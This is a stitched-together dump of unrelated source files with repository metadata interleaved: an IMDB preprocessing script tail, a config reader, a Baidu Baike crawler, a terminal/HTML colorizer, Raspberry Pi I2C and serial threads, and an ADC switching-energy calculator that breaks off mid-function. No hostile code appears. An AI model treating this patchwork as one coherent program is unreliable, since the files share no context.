review_list[i]=list_review(full_review_list[i],indexlist)
testfile = open('aclImdb_v1/aclImdb/test/labeledBow.feat','r',encoding='utf-8')
test_review_list=testfile.readlines()
validation_list_pos=random.sample(range(0,int(len(full_review_list)/2)),int(no_validation/2))
validation_list_neg= random.sample(range(int(len(full_review_list)/2),len(full_review_list)),int(no_validation/2))
validation_list = validation_list_pos+validation_list_neg
validation_reviews={}
for i in validation_list:
validation_reviews[i]=list_review(full_review_list[i],indexlist)
test_list_pos=random.sample(range(0,int(len(test_review_list)/2)),int(no_test/2))
test_list_neg= random.sample(range(int(len(test_review_list)/2),len(test_review_list)),int(no_test/2))
test_list=test_list_neg+test_list_pos
test_reviews={}
for i in test_list:
test_reviews[i]=list_review(test_review_list[i],indexlist)
save(validation_reviews,'validationreviews.pkl')
save(validation_list,'validationlist.pkl')
save(test_reviews,'testreviews.pkl')
save(test_list,'testlist.pkl')
save(random_list_pos,'randompos.pkl')
save(random_list_neg,'randomneg.pkl')
save(review_list,'reviewlist.pkl')
save(indexlist,'indexlist.pkl')
if __name__=="__main__":
preprocess()
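# --- usage sketch (assumption) ---
# after preprocess() has run once, later scripts can reload the saved artifacts:
#     review_list = load('reviewlist.pkl')
#     indexlist = load('indexlist.pkl')
#     test_reviews = load('testreviews.pkl')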
|
[
"2016csb1026@iitrpr.ac.in"
] |
2016csb1026@iitrpr.ac.in
|
2fb3b208f8422d53eb69c09474b9e669b7f9db6b
|
b30def8f44060e373dba0de9facb62964224d285
|
/config.py
|
97dc08977f3cd997b513264801ccb5c7cf5c2f98
|
[] |
no_license
|
saakash309/Data-Processing-
|
1136e2612b7068d9fef695587070e2b98ebb7ff8
|
7857de4654c611689b422d8d6c88e61ba498a4c0
|
refs/heads/main
| 2023-09-04T20:30:49.225368
| 2021-11-23T06:04:45
| 2021-11-23T06:04:45
| 430,939,150
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,185
|
py
|
from configparser import ConfigParser
from pprint import pprint
#reading the config file
class Data():
'''
    Return the set of columns from a config file that will be displayed
Path = path of the configuration file
'''
def __init__(self,path) -> None:
self.path = path
def fields(self):
config = ConfigParser()
config.read(self.path)
#finding the fields that needs to be displayed
keys = []
if 'Idnumber' not in (config['Fields'])or config['Fields']['Idnumber']=='no':
keys.append('IDNUMBER')
#print(config.options('Fields'))
for key,value in config.items(config.sections()[0]):
if value == 'yes':
keys.append(str(key).upper().strip())
return keys
def fpath(self):
config = ConfigParser()
config.read(self.path)
for key,value in config.items(config.sections()[-1]):
#print(key,value)
if key == 'PathtoDataFile'.lower():
#print(value)
return value
        # only give up after every option in the section has been checked
        return None
#print(Data('config.ini').fpath())
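# --- illustrative config (assumption; file contents are made up) ---
# [Fields]
# idnumber = no
# name = yes
# age = yes
# [Path]
# PathtoDataFile = data.csv
#
# Data('config.ini').fields()  ->  ['IDNUMBER', 'NAME', 'AGE']
# Data('config.ini').fpath()   ->  'data.csv'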
|
[
"noreply@github.com"
] |
saakash309.noreply@github.com
|
bcfca9b47c82bc52528894a9459bda4232f48196
|
f582461cc398909906a1ca65fa250105319289d8
|
/spider_main.py
|
986f58a635f53e9861335c7fe8c902f544f9017e
|
[] |
no_license
|
ITT13021/baike_spider
|
d0dd637074c99cd7a1b9d703b4406939ed745fbd
|
2a2eea68dd94bf15ec1769986554514c53a28854
|
refs/heads/master
| 2021-07-04T12:33:37.377379
| 2017-09-27T01:49:00
| 2017-09-27T01:49:00
| 104,868,967
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,568
|
py
|
# coding=utf-8
from baike_spider import html_downloader
from baike_spider import html_outputer
from baike_spider import html_parser
from baike_spider import url_manager
class SpriderMain(object):
def __init__(self):
self.urls = url_manager.UrlManager()
self.downloader = html_downloader.HtmlDownloader()
self.parser = html_parser.HtmlParser()
self.outputer = html_outputer.HtmlOutputer()
def craw(self, root_url, count):
i = 1
self.urls.add_new_url(root_url)
while self.urls.has_new_url():
if count != 0:
try:
new_url = self.urls.get_new_url()
print 'we are collecting in %d : %s' % (i, new_url)
html_cont = self.downloader.download(new_url)
new_urls, new_data = self.parser.parse(new_url, html_cont)
self.urls.add_new_urls(new_urls)
self.outputer.collect_data(new_data)
except:
print "collected failed in %d" % i
i += 1
count -= 1
else:
break
self.outputer.output_html()
if __name__ == "__main__":
obj_spider = SpriderMain()
    root_url = raw_input("Enter the first Baidu Baike entry page to crawl; related entries will be collected from it, e.g. https://baike.baidu.com/item/Python:" + "\n")
    count = input("Enter the number of entries to crawl (the more entries, the longer it takes!): ")
obj_spider.craw(root_url, count)
|
[
"473457683@qq.com"
] |
473457683@qq.com
|
dca0df86cf196077787b8351e77a52367efaf8ea
|
a0af94e54aaeaf0dfc373196c3bc7372926a7c7f
|
/colorize
|
aca3ecc24004252a087c462d6b1a71056603bbf5
|
[
"MIT"
] |
permissive
|
cheshirex/colorize
|
7170f3ff250009bc4ca40e7740498328b3bf1ab0
|
c95049c312a422023e48b8e1522c57b4c2913446
|
refs/heads/main
| 2023-01-07T05:58:04.019437
| 2020-11-04T10:27:57
| 2020-11-04T10:27:57
| 309,968,575
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,445
|
#!/usr/bin/env python
# Tool to colorize output based on regular expressions, designed to work both
# with ANSI escape sequences and with HTML color codes. Data to colorize is input
# on STDIN, and result is output on STDOUT
# Usage:
# colorize <ansi|html> <color config filename>
import sys
import re
html_escape_table = {
"&": "&",
'"': """,
"'": "'",
">": ">",
"<": "<"
}
def htmlEscape(text):
    """Produce entities within text."""
    # generator expressions need Python 2.4+, so check the interpreter version
    # up front rather than trying to catch a compile-time SyntaxError at runtime
    if sys.version_info < (2, 4):
        print "HTML mode not supported prior to Python 2.4"
        sys.exit(1)
    return "".join(html_escape_table.get(c, c) for c in text)
def printHtmlHeader():
print '''
<html>
<head>
<style text="text/css">
body {
font-family: Monaco,
"Bitstream Vera Sans Mono",
"Lucida Console",
Terminal,
monospace;
font-size: 14;
}
</style>
</head>
<body>
<pre>'''
def printHtmlFooter():
print '''
</pre>
</body>
</html>
'''
escape = '\033'
colors = {'black': {'ansi': {'begin': escape + '[0;30m', 'end': escape + '[0m'},
'html': {'begin': '<font color=\'black\'>', 'end': '</font>'}},
'red': {'ansi': {'begin': escape + '[0;31m', 'end': escape + '[0m'},
'html': {'begin': '<font color=\'red\'>', 'end': '</font>'}},
'green': {'ansi': {'begin': escape + '[0;32m', 'end': escape + '[0m'},
'html': {'begin': '<font color=\'green\'>', 'end': '</font>'}},
'yellow': {'ansi': {'begin': escape + '[0;33m', 'end': escape + '[0m'},
'html': {'begin': '<font color=\'#C9960C\'>', 'end': '</font>'}},
'blue': {'ansi': {'begin': escape + '[0;34m', 'end': escape + '[0m'},
'html': {'begin': '<font color=\'blue\'>', 'end': '</font>'}},
'purple': {'ansi': {'begin': escape + '[0;35m', 'end': escape + '[0m'},
'html': {'begin': '<font color=\'purple\'>', 'end': '</font>'}},
'cyan': {'ansi': {'begin': escape + '[0;36m', 'end': escape + '[0m'},
'html': {'begin': '<font color=\'cyan\'>', 'end': '</font>'}},
'white': {'ansi': {'begin': escape + '[0;37m', 'end': escape + '[0m'},
'html': {'begin': '<font color=\'white\'>', 'end': '</font>'}}}
if sys.argv[1] in ('html', 'ansi'):
format = sys.argv[1]
else:
    print 'Usage: colorize <ansi|html> <color config filename>'
    sys.exit(-1)
rules = {}
# Read color regular expressions
configFile = open(sys.argv[2])
for line in configFile:
if line[0] == '#':
continue
# Read each line - first word is colour ID, rest of line is regular expression
color, regex = line.strip().split(None, 1)
rules[regex] = color
configFile.close()
if format == 'html':
printHtmlHeader()
for line in sys.stdin:
# Clean up Unicode characters
line = line.replace('\xe2\x80\x98', "'").replace('\xe2\x80\x99',"'")
for regex, color in rules.items():
if re.search(regex, line):
if format == 'html':
line = htmlEscape(line)
print colors[color][format]['begin'] + line.strip() + colors[color][format]['end']
break
else:
if format == 'html':
line = htmlEscape(line)
print line.strip()
if format == 'html':
printHtmlFooter()
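# --- example rules file and invocation (assumption; illustrative only) ---
# each non-comment line of the config is "<color> <regex>", e.g.
#   red     ERROR
#   yellow  WARN(ING)?
#   green   PASS|OK
# and the script is used as a filter:
#   some_command | ./colorize ansi rules.conf
#   some_command | ./colorize html rules.conf > log.html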
|
[
"noreply@github.com"
] |
cheshirex.noreply@github.com
|
|
1c6ff28e26ea56bf58d2d64410f7f7ccc128b1c3
|
a51854991671a4389902945578288da34845f8d9
|
/libs/Utility/__init__.py
|
413df21a5385589d95b5c2ec9bf735a694a5e504
|
[] |
no_license
|
wuyou1102/DFM_B2
|
9210b4b8d47977c50d92ea77791f477fa77e5f83
|
69ace461b9b1b18a2269568110cb324c04ad4266
|
refs/heads/master
| 2020-04-13T18:54:20.045734
| 2019-06-17T12:46:23
| 2019-06-17T12:46:23
| 163,387,873
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 297
|
py
|
# -*- encoding:UTF-8 -*-
from libs.Utility import Logger
import Alert as Alert
import Random as Random
from ThreadManager import append_thread
from ThreadManager import is_alive
from ThreadManager import query_thread
from Common import *
import ParseConfig as ParseConfig
from Serial import Serial
|
[
"jotey@qq.com"
] |
jotey@qq.com
|
fa4752f737897f35e16ed0b252a1230746f6ee6d
|
7ff3ec2f2a6e093a63f09a30ec985c3564c79159
|
/Demo_2/Raspberry_Pi/Threading/Pi_Comms_Multi_Threading.py
|
7b0e7ee2d2290889fa410ff3a3ec584c98dfcb2e
|
[] |
no_license
|
lkseattle/SEED_FALL_2020_T3-1
|
468dafe4193a6663d5dc6fa09ea7cfc9953f4455
|
b7e026fee1d6f77f62fd84547beebac3b76c2532
|
refs/heads/master
| 2023-01-10T21:47:24.578863
| 2020-11-10T09:34:58
| 2020-11-10T09:34:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,016
|
py
|
#Cameron Kramr
#10/09/2020
#EENG 350
#Section A
#Computer Vision
#NOTE, this module requires pygame to be installed in order to run
#The code in this file deals with communicating with other devices outside of the Raspberry Pi.
import multiprocessing as mp
import termios
import os
import sys
from enum import Enum
from enum import IntEnum
import time
import serial
import board
import busio
import adafruit_character_lcd.character_lcd_rgb_i2c as character_lcd
from smbus2 import SMBus
import math
import ctypes
#import spidev
#Create the valid commands for controlling thread operation
class I2C_CMD(IntEnum):
LCD_CLR_MSG = 1
WRITE_ARDU = 2
FETCH_ANGLE = 3
class ARDU_CMD(IntEnum):
TARGET = 250
SEND = 1
RECEIVE = 2
#Main Serial handler thread deals with Serial nonsense.
def Serial_Handler(input_pipe, file = '/dev/ttyACM0', baud = 250000):
#Initialize Serial object
ser = serial.Serial(file, baud)
FPS = 100
data2 = ""
Start = time.time()
#time.sleep(2) #might need it so 'ser' can work properly
#Initialize variables
data = [0,0,0]
while (True):
#Data shape:
#[command, [magnitude, angle]]
#Non-blocking read of pipe waiting for input
try:
if(input_pipe.poll()):
data = input_pipe.recv()
while(ser.inWaiting()>0):
data2 += ser.readline().decode('utf-8')
#print("Arduino Data:")
#print(data2)
except:
print("Serial Error")
#print("Looping")
if(data[0] == ARDU_CMD.SEND): #Clear LCD and send it a string to display
try:
#ser.write((' '.join([str(item) for item in data[1]]
for i in data[1]:
if(i != '\n'):
ser.write(i.encode())
#print(i)
#print("Sent Ardu:" + str(data[1]))
#pass
except:
print("Something's wrong with sending Serial Data!")
if(data2 != ""): #if we need to get the position from arduino, this if statement
#will do it. Feel free to alter "get_position" to whatever you want.
try:
#data2 = ser.readline().decode('utf-8').rstrip() #gets data from arduino
input_pipe.send(data2)
data2 = ""
pass
except:
print("Something's wrong with getting Serial Data!")
#Clear data
data[0] = 0
#Frame lock arduino
while(time.time() - Start < 1/FPS):
pass
#Main I2C handler thread deals with I2C nonsense.
def I2C_Handler(input_pipe, size, address, color = [255, 0, 0]):
#Initialize I2C objects
i2c_bus = busio.I2C(board.SCL, board.SDA)
lcd = character_lcd.Character_LCD_RGB_I2C(i2c_bus, size[1], size[0])
lcd.clear()
#Initialize SMbus object
sm_bus = SMBus(1)
#Initialize variables
I2C_FPS = 100 #Frame rate control for thread to conserve resources
I2C_Start = 0
data = [0,0]
data_in = ctypes.c_int8
#Initialize LCD screen
lcd.clear()
lcd.color = color
lcd.message = "Init LCD Handler Done ;)"
while(True):
#Record time
I2C_Start = time.time()
#Data shape:
#[cmd, content]
#Non-blocking read of pipe waiting for input
if(input_pipe.poll()):
data = input_pipe.recv()
#Switch on command portion of data to figure out what to do
if(data[0] == I2C_CMD.LCD_CLR_MSG): #Clear LCD and send it a string to display
try:
#time.sleep(0.1)
lcd.clear()
lcd.message = str(data[1])
pass
except:
print("SM Bus Error!")
elif(data[0] == I2C_CMD.WRITE_ARDU): #Write to the arduino #not needed anymore?
try:
print(data[1])
sm_bus.write_byte_data(address, 0, int(data[1]))
except:
print("SM Bus Error!")
sm_bus = SMBus(1)
elif(data[0] == I2C_CMD.FETCH_ANGLE): #Fetch the angle from the arduino #not needed anymore?
#print(sm_bus.read_byte_data(address, 0))
try:
#Need to preserve the sign to make this sensible, use ctypes for that
data_in = ctypes.c_int8(sm_bus.read_byte_data(address, 0))
#Convert data in from byte to degree angle
data_in = data_in.value/128*180
#Send angle down pipe
input_pipe.send(data_in)
except:
print("SM Bus Error!")
#Clear data
data[0] = 0
#print("Sleep Time: " + str(max(1/I2C_FPS - (time.time() - I2C_Start),0)))
#Frame lock the thread to preserve resources
time.sleep(max(1/I2C_FPS - (time.time() - I2C_Start),0))
#print("I2C_FPS: " + str(int(1/(time.time() - I2C_Start))))
if __name__== "__main__":
Serial_pipe_1, Serial_pipe_2 = mp.Pipe(duplex = True)
comms = mp.Process(target = Serial_Handler, args=(Serial_pipe_2,))
comms.start()
Serial_pipe_1.send([ARDU_CMD.SEND, 123,456])
Serial_pipe_1.send([ARDU_CMD.SEND, 456,123])
Serial_pipe_1.send([ARDU_CMD.SEND, 1453,2345])
Serial_pipe_1.send([ARDU_CMD.RECEIVE, 1453,2345])
Serial_pipe_1.send([ARDU_CMD.RECEIVE, 1453,2345])
Serial_pipe_1.send([ARDU_CMD.RECEIVE, 1453,2345])
Serial_pipe_1.send([ARDU_CMD.RECEIVE, 1453,2345])
Serial_pipe_1.send([ARDU_CMD.RECEIVE, 1453,2345])
Serial_pipe_1.send([ARDU_CMD.RECEIVE, 1453,2345])
choar = input()
|
[
"cameronkramr@mines.edu"
] |
cameronkramr@mines.edu
|
b9f5b0e85ced88524ab8f2e59229df6b0f93c821
|
e60a342f322273d3db5f4ab66f0e1ffffe39de29
|
/parts/zodiac/chameleon/__init__.py
|
60fbbb344ac3c226ff2ca2148893e72d3fc26add
|
[] |
no_license
|
Xoting/GAExotZodiac
|
6b1b1f5356a4a4732da4c122db0f60b3f08ff6c1
|
f60b2b77b47f6181752a98399f6724b1cb47ddaf
|
refs/heads/master
| 2021-01-15T21:45:20.494358
| 2014-01-13T15:29:22
| 2014-01-13T15:29:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 75
|
py
|
/home/alex/myenv/zodiac/eggs/Chameleon-2.13-py2.7.egg/chameleon/__init__.py
|
[
"alex.palacioslopez@gmail.com"
] |
alex.palacioslopez@gmail.com
|
580dbd15bf43272f28e3f9bd42413a905510cd76
|
bef304291f5fe599f7a5b713d19544dc0cecd914
|
/todoapp/todo_list/forms.py
|
9fe1a617dd0f429fc6c8b3c1fa6885fee975c262
|
[] |
no_license
|
coderj001/django-todo-and-air-quality
|
9ca847143ea86677a0d54026c060638fabf8c042
|
012ee15fa3cfbf1aa08ae4513c3bf4fa828b3ba3
|
refs/heads/master
| 2020-12-14T20:20:49.845722
| 2020-01-19T15:06:42
| 2020-01-19T15:06:42
| 234,855,834
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 147
|
py
|
from django import forms
from .models import ToDoList
class ListForm(forms.ModelForm):
    class Meta:
        model = ToDoList
        fields = ['item', 'completed']
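# --- usage sketch (assumption; the original views are not shown here) ---
# form = ListForm(request.POST or None)
# if form.is_valid():
#     form.save()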
|
[
"amirajubolchi001@gmail.com"
] |
amirajubolchi001@gmail.com
|
d57c68ff01ec5c6b974091d91da38f8ac7708ec3
|
26371093460ea3026cdcd74e624b0c2d4b1d5892
|
/Staff.py
|
2fae3241689d94a0185840d38b2a6b21e9b9a6a3
|
[] |
no_license
|
meyerkeaton/ktmcbk
|
0b636b1bc8e8be022f6423d88776191a606949c7
|
5bca15495ee1066658c59ae24c15be4028f8a4ff
|
refs/heads/main
| 2022-12-28T05:41:09.453076
| 2020-10-15T05:09:20
| 2020-10-15T05:09:20
| 304,215,581
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 883
|
py
|
import json
import User
class Staff(User.User):
def update_course_db(self):
with open('Data/courses.json', 'w') as fp:
json.dump(self.all_courses, fp)
def create_assignment(self,assignment_name, due_date, course):
assignment = {
assignment_name: {
'due_date': due_date
}
}
self.all_courses[course]['assignments'].update(assignment)
self.update_course_db()
def change_grade(self,user,course,assignment,grade):
        self.users[user]['courses'][course][assignment]['grade'] = grade  # store the grade that was passed in
self.update_user_db()
def check_grades(self,name,course):
assignments = self.users[name]['courses'][course]
grades = []
for key in assignments:
grades.append([key, assignments[key]['grade']])
return grades
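# --- usage sketch (assumption; User is expected to provide self.users,
# self.all_courses and update_user_db()) ---
# staff = Staff(...)                                   # constructor arguments come from User
# staff.create_assignment('hw1', '2020-11-01', 'CS101')
# staff.change_grade('alice', 'CS101', 'hw1', 95)
# staff.check_grades('alice', 'CS101')                 # -> [['hw1', 95], ...]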
|
[
"noreply@github.com"
] |
meyerkeaton.noreply@github.com
|
6b2843c0a678ffe8be10b0d147adee1740dc58da
|
a5f8eb72e680a906f74ae53d2b6428fbb008320c
|
/31-zip.py
|
a48620bb23a58f1ecfdebf53d239f9cf71d077e5
|
[] |
no_license
|
arn1992/Basic-Python
|
0588858aed632ac9e65e5618d5b57bcbe71c45bc
|
09b9bf2364ddd2341f95445e18868e2e0904604d
|
refs/heads/master
| 2020-06-28T18:35:32.394730
| 2016-12-15T07:21:33
| 2016-12-15T07:21:33
| 74,483,622
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 127
|
py
|
first=['ratul','aminur','arn']
last=['tasneem','ishrar']
names=zip(first,last)
for a,b in names:
print(a,b)
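# note: zip() stops at the shorter list, so only two pairs are printed:
#   ratul tasneem
#   aminur ishrar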
|
[
"noreply@github.com"
] |
arn1992.noreply@github.com
|
91f2e963910d164e1fa3ecf41f3875ae6dd1b8e6
|
4fc5c908df8c0aecb4943e798c9c71c542a96584
|
/samples/practice1_Milana.py
|
3d038dea120dcb17d2a350f9b410f72a73b176fa
|
[
"Apache-2.0"
] |
permissive
|
Milana009/UNN_HPC_SCHOOL_2019_ML
|
84d51cdd7a499139a0297a76522350de74b7ff4c
|
d5bb7a8ab5f026f2bc4df896019ded5987040295
|
refs/heads/master
| 2020-09-13T07:58:32.456350
| 2019-11-19T23:04:02
| 2019-11-19T23:04:02
| 222,703,246
| 1
| 0
|
Apache-2.0
| 2019-11-19T13:31:23
| 2019-11-19T13:31:22
| null |
UTF-8
|
Python
| false
| false
| 1,157
|
py
|
import sys
import cv2
import logging as log
import argparse
sys.path.append('../src')
from imagefilter import ImageFilter
def build_argparse():
parser=argparse.ArgumentParser()
parser.add_argument('-i', '--input', help = 'your input', type = str)
parser.add_argument('-w', '--width', help = 'your width', type = int)
parser.add_argument('-l', '--height', help = 'your height', type = int)
#
# Add your code here
#
return parser
def main():
log.basicConfig(format="[ %(levelname)s ] %(message)s", level=log.INFO, stream=sys.stdout)
log.info("Hello image filtering")
args = build_argparse().parse_args()
imagePath = args.input
log.info(imagePath)
image_source = cv2.imread(imagePath, 1)
log.info(image_source.shape)
myFilter = ImageFilter(gray = True, shape = (args.width, args.height))
image_final = myFilter.process_image(image_source)
cv2.imshow("Image", image_final)
cv2.waitKey(0)
cv2.destroyAllWindows()
#
# Add your code here
#
return
if __name__ == '__main__':
sys.exit(main())
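# --- usage sketch (assumption: example file name and sizes only) ---
#   python practice1_Milana.py -i image.jpg -w 320 -l 240
# reads image.jpg, passes it through ImageFilter (grayscale, resized to
# 320x240), and shows the result until a key is pressed.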
|
[
"Milana_Vagapova"
] |
Milana_Vagapova
|
9b500090e5537a2b729caa78d0590d8753bbca89
|
b92adbd59161b701be466b3dbeab34e2b2aaf488
|
/.c9/metadata/environment/fb_post_learning/fb_post_clean_arch/views/delete_post/api_wrapper.py
|
34ca1ee1bb0f47da7e80c5643b393f16129c97b8
|
[] |
no_license
|
R151865/cloud_9_files
|
7486fede7af4db4572f1b8033990a0f07f8749e8
|
a468c44e9aee4a37dea3c8c9188c6c06e91cc0c4
|
refs/heads/master
| 2022-11-22T10:45:39.439033
| 2020-07-23T09:31:52
| 2020-07-23T09:31:52
| 281,904,416
| 0
| 1
| null | 2022-11-20T00:47:10
| 2020-07-23T09:08:48
|
Python
|
UTF-8
|
Python
| false
| false
| 480
|
py
|
{"filter":false,"title":"api_wrapper.py","tooltip":"/fb_post_learning/fb_post_clean_arch/views/delete_post/api_wrapper.py","undoManager":{"mark":-1,"position":-1,"stack":[]},"ace":{"folds":[],"scrolltop":0,"scrollleft":0,"selection":{"start":{"row":17,"column":17},"end":{"row":17,"column":75},"isBackwards":true},"options":{"guessTabSize":true,"useWrapMode":false,"wrapToView":true},"firstLineState":0},"timestamp":1590407780811,"hash":"c7949160d2afabed4398d4df3013ec47e225082d"}
|
[
"r151865@rguktrkv.ac.in"
] |
r151865@rguktrkv.ac.in
|
d8aac991213a5218618098233100d5a23603c036
|
9d48dc6e54f959285ed3ab15006d664d42db7c01
|
/assistant_module/get_energy.py
|
17e7b4311937c5f4041a66ce17b38da77f929ad5
|
[] |
no_license
|
sandylaker/saradc_toolbox
|
d971936ec5b13fb467f991b351b30fccad00876a
|
b7b8f3d6c15a7c522cd89267739318c78e4d6a37
|
refs/heads/master
| 2020-03-27T11:42:29.520183
| 2018-09-15T21:03:47
| 2018-09-15T21:03:47
| 146,503,308
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,098
|
py
|
import numpy as np
from assistant_module.get_decision_path import get_decision_path
def get_energy(n, switch='conventional', structure='conventional'):
"""
get the energy consumption of every code, each code represents the possible decision level before the last
    decision (an odd decimal integer).
:param n: resolution of DAC
:param switch: switching method: 'conventional': conventional one-step switching
'monotonic': monotonic capacitor switching, in each transition step, only one
capacitor in one side is switched.
'mcs': merged capacitor switching
'split': split-capacitor method. The MSB capacitor is split into a copy of the
rest of the capacitor array. When down-switching occurs, only the
corresponding capacitor in the sub-capacitor array is discharged to the
ground
:param structure: structure of ADC: 'conventional': conventional single-ended structure
'differential': has two arrays of capacitors, the switch states of positive and
negative side are complementary. The energy consumption is two
times of that in the conventional structure, if conventional
switching method is used.
:return: a ndarray, each element represents the energy consumption of each code.
"""
    # possible decision level before the last comparison
code_decimal = np.arange(1, 2 ** n, 2)
decision_path = get_decision_path(n) # two-dimensional
# store the switching energy of each code
sw_energy_sum = np.zeros(len(code_decimal))
if switch == 'conventional':
coefficient = 1
if structure == 'differential':
# the switching states of both sides are complementary, so that the energy consumption is two times of
# that in conventional(single-ended) structure.
coefficient = 2
for i in range(len(code_decimal)):
# weight of each decision threshold layer
weights_ideal = [0.5 ** (i + 1) for i in range(n)]
sw_energy = np.zeros(n)
sw_energy[0] = 0.5 * decision_path[i, 0]
# calculate the energy for up-switching steps
# 1 is the index offset
sw_up_pos = np.where(
decision_path[i, 1:] > decision_path[i, 0:-1])[0] + 1
# print(code_decimal[i],' sw_up_pos: ',sw_up_pos)
if not sw_up_pos.size == 0:
# sw_energy[sw_up_pos] = decision_path[i,sw_up_pos]*(-1)*(weights_ideal[sw_up_pos])+ 2**(n-1-sw_up_pos)
# 2**(n-1-sw_up_pos) stands for E_sw = C_up*V_ref^2
for k in sw_up_pos:
# \delta V_x is positive,so *(-1)
sw_energy[k] = decision_path[i, k] * \
(-1) * (weights_ideal[k]) + 2**(n - 1 - k)
sw_dn_pos = np.where(
decision_path[i, 1:] < decision_path[i, 0:-1])[0] + 1
# print(code_decimal[i],' sw_dn_pos: ',sw_dn_pos)
if not sw_dn_pos.size == 0:
# sw_energy[sw_dn_pos] = decision_path[i,sw_dn_pos]*(-1)*(weights_ideal[sw_dn_pos]) + 2**(n-1-sw_dn_pos)
for k in sw_dn_pos:
sw_energy[k] = decision_path[i, k] * \
(weights_ideal[k]) + 2**(n - 1 - k)
# print(code_decimal[i],': ',sw_energy)
sw_energy_sum[i] = np.sum(sw_energy)
return coefficient * sw_energy_sum
if switch == 'monotonic':
if structure == 'conventional':
raise Exception(
'Conventional(single-ended) structure does not support monotonic switching.')
for i in range(len(code_decimal)):
# the total capacitance of positive and negative sides
c_tp = c_tn = 2 ** (n - 1)
# vx unchanged in the first step
weights_ideal = np.concatenate(
([0], [0.5 ** j for j in range(1, n)]))
sw_energy = np.zeros(n)
sw_energy[0] = 0
# define an array to store the switching types(up or down) of each
# step.
sw_process = np.zeros(n)
# find the up-switching and down-switching steps
# 1 is the index offset
sw_up_pos = np.where(
decision_path[i, 1:] > decision_path[i, 0:-1])[0] + 1
sw_dn_pos = np.where(
decision_path[i, 1:] < decision_path[i, 0:-1])[0] + 1
sw_process[sw_up_pos], sw_process[sw_dn_pos] = 1, 0
for k in range(1, n):
# if up-switching occurs, a capacitor of the p-side will be connected to the ground while n-side remains
# unchanged; if down-switching occurs, a capacitor of n -side will be connected to the ground while
# p-side remains unchanged. Attention: here is the range(1,n), when k starts from 1, the first
# capacitor switched to the ground is 2**(n-2)*C0 ( the MSB capacitor differs from which in the
# conventional case.
c_tp = c_tp - 2**(n - 1 - k) * sw_process[k]
c_tn = c_tn - 2**(n - 1 - k) * (1 - sw_process[k])
sw_energy[k] = c_tp * (-1) * (- weights_ideal[k]) * sw_process[k] + \
c_tn * (-1) * (- weights_ideal[k]) * (1 - sw_process[k])
sw_energy_sum[i] = np.sum(sw_energy)
return sw_energy_sum
if switch == 'mcs':
if structure == 'conventional':
raise Exception(
                'Conventional (single-ended) structure does not support merged capacitor switching (mcs).')
weights_ideal = np.concatenate(
([0.5 ** j for j in range(1, n)], [0.5 ** (n - 1)]))
cap_ideal = np.concatenate(
([2 ** (n - 2 - j) for j in range(n - 1)], [1]))
for i in range(len(code_decimal)):
sw_energy = np.zeros(n)
# find the up-switching and down-switching steps
# 1 is the index offset
sw_up_pos = np.where(
decision_path[i, 1:] > decision_path[i, 0:-1])[0] + 1
sw_dn_pos = np.where(
decision_path[i, 1:] < decision_path[i, 0:-1])[0] + 1
# connection of bottom plates of positive and negative capacitor arrays.
# at the sampling phase, all the bottom plates are connected to Vcm
# = 0.5* Vref
cap_connect_p = np.full((n, n), 0.5)
cap_connect_n = np.full((n, n), 0.5)
# define an array to store the switching types(up or down) of each
# step.
sw_process = np.zeros(n)
sw_process[sw_up_pos], sw_process[sw_dn_pos] = 1.0, 0
# store the v_x of both sides in each step, here the term v_ip and
# v_in are subtracted.
v_xp = np.zeros(n)
v_xn = np.zeros(n)
# store the voltage difference between the plates of each capacitor in each step, here the term v_ip- v_cm
# and v_in - v_cm are subtracted, because when calculating the change of v_cap, these terms are constant and
# so eliminated.
v_cap_p = np.zeros((n, n))
v_cap_n = np.zeros((n, n))
for k in range(1, n):
# update the connections of bottom plates
cap_connect_p[k:, k - 1], cap_connect_n[k:,
k - 1] = 1 - sw_process[k], sw_process[k]
v_xp[k] = np.inner(cap_connect_p[k], weights_ideal)
v_xn[k] = np.inner(cap_connect_n[k], weights_ideal)
# calculate the voltage across the top and bottom plates of
# capacitors
v_cap_p[k] = v_xp[k] - cap_connect_p[k]
v_cap_n[k] = v_xn[k] - cap_connect_n[k]
# find index of the capacitors connected to the reference
# voltage
c_tp_index = np.where(cap_connect_p[k] == 1.0)[0]
c_tn_index = np.where(cap_connect_n[k] == 1.0)[0]
# energy = - V_ref * ∑(c_t[j] * ∆v_cap[j])
sw_energy_p = - \
np.inner(cap_ideal[c_tp_index], (v_cap_p[k, c_tp_index] - v_cap_p[k - 1, c_tp_index]))
sw_energy_n = - \
np.inner(cap_ideal[c_tn_index], (v_cap_n[k, c_tn_index] - v_cap_n[k - 1, c_tn_index]))
sw_energy[k] = sw_energy_p + sw_energy_n
sw_energy_sum[i] = np.sum(sw_energy)
return sw_energy_sum
if switch == 'split':
coefficient = 1
if structure == 'differential':
coefficient = 2
if n < 2:
raise Exception(
"Number of bits must be greater than or equal to 2. ")
# capacitor array, cap_ideal has the shape of (2,n), in which the first row is the sub-capacitor array of the
# MSB capacitor, the second row is the main capacitor array(excluding
# the MSB capacitor)
cap_ideal = np.repeat(np.concatenate(
([2**(n - 2 - i) for i in range(n - 1)], [1]))[np.newaxis, :], 2, axis=0)
weights_ideal = cap_ideal / (2**n)
for i in range(len(code_decimal)):
sw_energy = np.zeros(n)
sw_energy[0] = 0.5 * decision_path[i, 0]
# find the up-switching and down-switching steps
# 1 is the index offset
sw_up_pos = np.where(
decision_path[i, 1:] > decision_path[i, 0:-1])[0] + 1
sw_dn_pos = np.where(
decision_path[i, 1:] < decision_path[i, 0:-1])[0] + 1
# define an array to store the switching types(up or down) of each
# step.
sw_process = np.zeros(n)
sw_process[sw_up_pos], sw_process[sw_dn_pos] = 1.0, 0
# store the bottom plates connection in each step
cap_connect = np.repeat(
np.vstack(
(np.ones(n), np.zeros(n)))[
np.newaxis, :, :], n, axis=0)
# store the voltage at X point ,here the term v_cm - v_in is
# subtracted
v_x = np.zeros(n)
v_x[0] = np.sum(np.multiply(weights_ideal, cap_connect[0]))
# the voltage between top plates and bottom plates
